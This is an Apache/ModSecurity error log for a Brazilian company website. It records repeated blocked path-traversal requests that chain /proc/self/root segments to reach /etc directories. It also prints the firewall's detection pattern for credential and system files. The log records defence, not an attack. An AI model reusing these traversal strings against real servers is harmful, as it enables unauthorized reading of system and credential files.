https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:31:01.318317 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.241.31:33782] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnIFQeiSKl8TjouI-YxJgAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:31:02.991393 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:33784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnIFuyqAr6etmhZHNpBRAAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:31:03.131189 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.241.31:33784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnIF-yqAr6etmhZHNpBRgAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:31:05.204790 2026] [:error] [pid 2598:tid 140411607643904] [client 74.7.241.31:33790] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnIGRj0p0SRWAqcjGGTiAAAAxA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:31:12.133639 2026] [proxy_fcgi:error] [pid 2473:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:35660] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:31:36.130744 2026] [proxy_fcgi:error] [pid 6296:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:36212] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:31:45.208615 2026] [:error] [pid 29151:tid 140411616036608] [client 74.7.241.31:57380] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnIQfPqhzTj3BvfDX-g6AAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:31:58.033814 2026] [proxy_fcgi:error] [pid 6296:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:36736] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:32:05.491711 2026] [:error] [pid 29151:tid 140411725141760] [client 74.7.241.31:57380] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnIVfPqhzTj3BvfDX-g_gAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:32:20.125798 2026] [proxy_fcgi:error] [pid 31803:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37164] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:32:35.143287 2026] [:error] [pid 7004:tid 140411725141760] [client 74.7.243.128:56194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnIc8U6Sx0TG1YjmQjIGQAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:32:42.042250 2026] [proxy_fcgi:error] [pid 19507:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37616] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:33:04.127050 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:38058] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:33:09.578875 2026] [mime_magic:error] [pid 29151:tid 140411599251200] (70014)End of file found: [client 216.73.216.191:2159] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Tue Mar 17 18:33:09.579152 2026] [access_compat:error] [pid 29151:tid 140411599251200] [client 216.73.216.191:2159] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5
[Tue Mar 17 18:33:15.666613 2026] [:error] [pid 7437:tid 140411699963648] [client 74.7.241.31:49580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnImweiSKl8TjouI-YxkwAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:33:26.133780 2026] [proxy_fcgi:error] [pid 25836:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:38552] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:33:37.328582 2026] [:error] [pid 7437:tid 140411699963648] [client 74.7.241.31:49580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnIsAeiSKl8TjouI-YxpAAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:33:41.702506 2026] [:error] [pid 7004:tid 140411540502272] [client 74.7.241.31:36584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnItcU6Sx0TG1YjmQjIRQAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:33:47.106072 2026] [proxy_fcgi:error] [pid 6296:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:39004] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:33:48.696189 2026] [:error] [pid 2598:tid 140411658000128] [client 74.7.241.31:35944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnIvBj0p0SRWAqcjGGTvgAAAwo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:34:11.925155 2026] [proxy_fcgi:error] [pid 7004:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:39454] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:34:35.129238 2026] [proxy_fcgi:error] [pid 6296:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40172] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:34:41.570358 2026] [core:alert] [pid 19507:tid 140411725141760] [client 74.7.243.128:38090] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/bin
[Tue Mar 17 18:34:44.175984 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:35948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnI9OyqAr6etmhZHNpBswAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:34:57.125804 2026] [proxy_fcgi:error] [pid 2473:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:40766] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:35:18.136800 2026] [proxy_fcgi:error] [pid 7437:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:41296] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:35:29.219017 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:40944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJIda6ubjKNq_cu4Yh4wAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:35:31.740143 2026] [:error] [pid 6296:tid 140411658000128] [client 74.7.228.61:56672] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnJI3Ik7brgkOH-rIWm4wAAAUo"]
[Tue Mar 17 18:35:46.129786 2026] [proxy_fcgi:error] [pid 2473:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41874] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:35:48.746290 2026] [:error] [pid 6296:tid 140411691570944] [client 74.7.244.43:41966] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnJNHIk7brgkOH-rIWm7QAAAUY"]
[Tue Mar 17 18:35:56.190967 2026] [:error] [pid 29151:tid 140411540502272] [client 74.7.243.128:60528] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJPPPqhzTj3BvfDX-hfQAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:36:08.125793 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:42286] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:36:08.399042 2026] [:error] [pid 2598:tid 140411658000128] [client 74.7.241.31:42638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJSBj0p0SRWAqcjGGUFQAAAwo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:36:14.595793 2026] [:error] [pid 6296:tid 140411582465792] [client 74.7.241.31:47426] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJTnIk7brgkOH-rIWnAQAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:36:16.315554 2026] [:error] [pid 6296:tid 140411666392832] [client 74.7.241.31:47436] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJUHIk7brgkOH-rIWnAgAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:36:18.674138 2026] [:error] [pid 7004:tid 140411607643904] [client 74.7.241.31:50570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJUcU6Sx0TG1YjmQjIowAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:36:30.133796 2026] [proxy_fcgi:error] [pid 6296:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42718] AH01075: Error dispatching request to : (polling)
